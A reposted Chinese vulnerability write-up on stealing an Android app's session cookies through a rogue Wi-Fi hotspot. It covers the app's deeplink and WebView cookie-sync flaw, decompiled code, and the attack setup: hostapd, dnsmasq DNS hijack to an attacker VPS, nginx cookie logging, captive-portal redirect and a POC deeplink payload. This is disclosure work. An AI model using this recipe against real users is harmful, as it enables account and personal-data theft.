當(dāng)前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

记一次某APK的恶意WIFI攻击

發(fā)布時間：2024/1/23 编程问答 29 豆豆

生活随笔收集整理的這篇文章主要介紹了记一次某APK的恶意WIFI攻击小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

用戶接入惡意WIFI即打開某APP，泄露用戶cookie，攻擊者可以通過token獲取用戶手機號、收藏、收貨地址等

漏洞詳情

查看manifest.xml有如下deeplink activity

"com.xxxx.client.android.modules.deeplink.ParseDeepLinkActivity" android:noHistory="true" android:theme="@style/Transparent" android:windowSoftInputMode="0x10"><intent-filter><action android:name="com.xxxx.client.android.activity.HomeActivity"/></intent-filter><intent-filter><action android:name="android.intent.action.VIEW"/><category android:name="android.intent.category.DEFAULT"/><category android:name="android.intent.category.BROWSABLE"/><data android:scheme="scheme"/></intent-filter> </activity>

逆向ParseDeepLinkActivity代碼

@Override // android.app.Activity public void onCreate(Bundle arg13) {String v0;e v13;Intent v1_2;String frompage;String v3 = "";super.onCreate(arg13);if (s.i()) {try {this.uri = this.getIntent().getData();if (this.uri == null) {this.finish();return;}e.e.b.a.n.a.d.b();jb.b("CT_TAG", "uri = " + this.uri);v3 = this.uri.getQuery();if (TextUtils.isEmpty(v3)) {goto label_61;} else {this.schemabean = g.SCHEME_GETURLJSON(v3);v3 = this.schemabean;if (((SchemeBean)v3) == null) {goto label_61;}boolean v3_1 = TextUtils.isEmpty(this.schemabean.getFrompage());goto label_37;}goto label_62;}catch(Exception v1) {goto label_174;} ..

會從查詢參數(shù)中獲取并反序列json，得到結(jié)構(gòu)SchemaBean，之后會根據(jù)bean的內(nèi)容進行派發(fā)。

if(bean1 != null) {if(g.a(v1, bean1, v6)) {return;}String v7_1 = bean.getChannelName();int v8 = -1;switch(v7_1.hashCode()) {case -2034194897: {boolean v7_2 = v7_1.equals("fenlei_detail");if(v7_2) {v8 = 18;}break;}case 3322092: {if(v7_1.equals("live")) {v8 = 0;}break;}case 1288290882: {if(v7_1.equals("wiki_all_product")) {v8 = 40;}break;}case 1843825908: {if(v7_1.equals("taskreward")) {v8 = 23;}break;}case 1991869741: {if(v7_1.equals("pinpai_detail")) {v8 = 17;}break;} ... case 3277: {if(v7_1.equals("h5")) {v8 = 60;}break;}

渠道非常多，h5表示要打開h5頁面，如下代碼會通過路由尋找跳轉(zhuǎn)到對應(yīng)的activity

case 60: {if(("1".equals(bean.getLogin())) && !e.e.b.a.b.c.Ya()) {Ea.a(v1, 0x392FC);return;}b v3_19 = e.a().a("path_activity_zdm_web_browser", "group_route_browser");v3_19.putstring("url", bean.getLinkVal());v3_19.putstring("sub_type", "h5");v3_19.putstring("from", e.e.b.a.u.h.a(v6));v3_19.t();goto label_1102;}

逆向路由注冊代碼，loadInto為路由統(tǒng)一注冊接口，找到對應(yīng)的activity為HybridActivity

public class o implements b {@Override // com.xxxx.android.router.api.e.bpublic void loadInto(Map arg8) {arg8.put("path_activity_zdm_web_browser", a.a(e.e.a.c.a.a.a.ACTIVITY, HybridActivity.class, "path_activity_zdm_web_browser", "group_route_browser", null, -1, 0x80000000));} }

分析HybridActivity的onCreate方法，里面初始化webview并且loadUrl

@Override // com.xxxx.client.android.base.BaseActivityprotected void onCreate(Bundle arg5) {super.onCreate(arg5);this.A = new HybridPresenter(this, this.za(), this.getIntent().getStringExtra("link_type"), this.getIntent().getStringExtra("sub_type"));if(com.xxxx.client.android.hybrid.b.a.a.TRANSPARENT == this.P().h()) {int v5 = Build.VERSION.SDK_INT;if(v5 >= 21) {int v0 = 0x500;if(v5 >= 23 && this.P().l() == 1) {v0 = 0x2500;}this.getWindow().getDecorView().setSystemUiVisibility(v0);this.getWindow().setStatusBarColor(ContextCompat.getColor(this.getContext(), 0x106000D));}}this.getLifecycle().a(this.A);if(2 == this.A.b(this.getIntent())) {return;}this.La();this.y = this.init_webview();this.A.a(this.getIntent());//這里會同步cookie }

遍歷webview加載的jsBridge，發(fā)現(xiàn)并沒有什么可利用的js接口，暫且不表。回到上文的同步cookie的代碼

public static void syncCookie(String arg1) {ia.syncCookie(arg1, false);}public static void syncCookie(String url, boolean arg9) { //arg9固定為falseif(!TextUtils.isEmpty(url) && ((arg9) || (url.contains(".xxxx.com")))) {try {jb.b("Nat: webView.syncCookie.url", url);CookieManager v9 = CookieManager.getInstance();String oldcookie = v9.getCookie(url);if(oldcookie != null) {jb.b("Nat: webView.syncCookie.oldCookie", oldcookie);}v9.setAcceptCookie(true);HashMap v2_1 = Na.a(true);if(v2_1 != null) {if(TextUtils.isEmpty(((CharSequence)v2_1.get("sess")))) {v9.setCookie(".xxxx.com", "sess=;");}if(TextUtils.isEmpty(((CharSequence)v2_1.get("ab_test")))) {v9.setCookie(".xxxx.com", "ab_test=;");}if(ia.isContain_smzdm_com(url)) {Iterator v2_2 = v2_1.entrySet().iterator();while(true) {boolean v3 = v2_2.hasNext();if(!v3) {break;}Object v3_1 = v2_2.next();Map.Entry v3_2 = (Map.Entry)v3_1;v9.setCookie(".yying.com", ((String)v3_2.getKey()) + "=" + Na.a(((String)v3_2.getValue())) + ";");v9.setCookie(".xxxx.com", ((String)v3_2.getKey()) + "=" + Na.a(((String)v3_2.getValue())) + ";");}v9.setCookie(".xxxx.com", "f=" + Na.a("android"));v9.setCookie(".xxxx.com", "v=" + Na.a("9.9.10"));v9.setCookie(".xxxx.com", "coupon_h5=" + com.xxxx.client.base.utils.b.c().a("coupon_h5") + ";");v9.setCookie("go.xxxx.com", "scene=" + Na.a(Aa.b) + ";");}}String v8_1 = v9.getCookie(url);if(v8_1 != null) {jb.b("Nat: webView.syncCookie.newCookie", v8_1);return;}}catch(Exception v8) {jb.b("Nat: webView.syncCookie failed", v8.toString());return;}} }

以上代碼的意義是為.xxxx.com和.yying.com設(shè)置cookie，如果URL的域名是其子域名，那么webview在訪問該URL時會自動帶上cookie。但是并沒有校驗URL是否為HTTPS，這里可以是HTTP，可以構(gòu)造DNS劫持。

攻擊過程

搭建惡意WIFI
虛擬機安裝kali，再通過apt安裝hostapd、dnsmasq和nginx，硬件使用USB無線網(wǎng)卡tplink WN722N。
1、啟動熱點
在hostapd.conf設(shè)置SSID為SZ Airport Free，無認(rèn)證，這個名字拿到機場相信一定會有所收獲

2、搭建本地DNS
在dnsmasq.conf中設(shè)置DHCP及DNS，將域名a.xxxx.com解析到我的外網(wǎng)VPS，該VPS上設(shè)置nginx的access_log記錄cookie。
3、設(shè)置captive-portal-login
華為手機進行網(wǎng)絡(luò)評估時，會訪問connectivitycheck.platform.hicloud.com。因此配置DNS使connectivitycheck.platform.hicloud.com解析為192.168.1.1，并在192.168.1.1上設(shè)置nginx使其返回302：

并在192.168.1.1/index.html中插入代碼使瀏覽器拉起APP
POC：
{"channelName":"h5","linkVal":"http://a.xxxx.com/jsloop.html"}
經(jīng)過URL編碼

總結(jié)

以上是生活随笔為你收集整理的记一次某APK的恶意WIFI攻击的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。

上一篇： Linux通过第三方应用提权实战总结
下一篇：某公司邮件系统的安全检测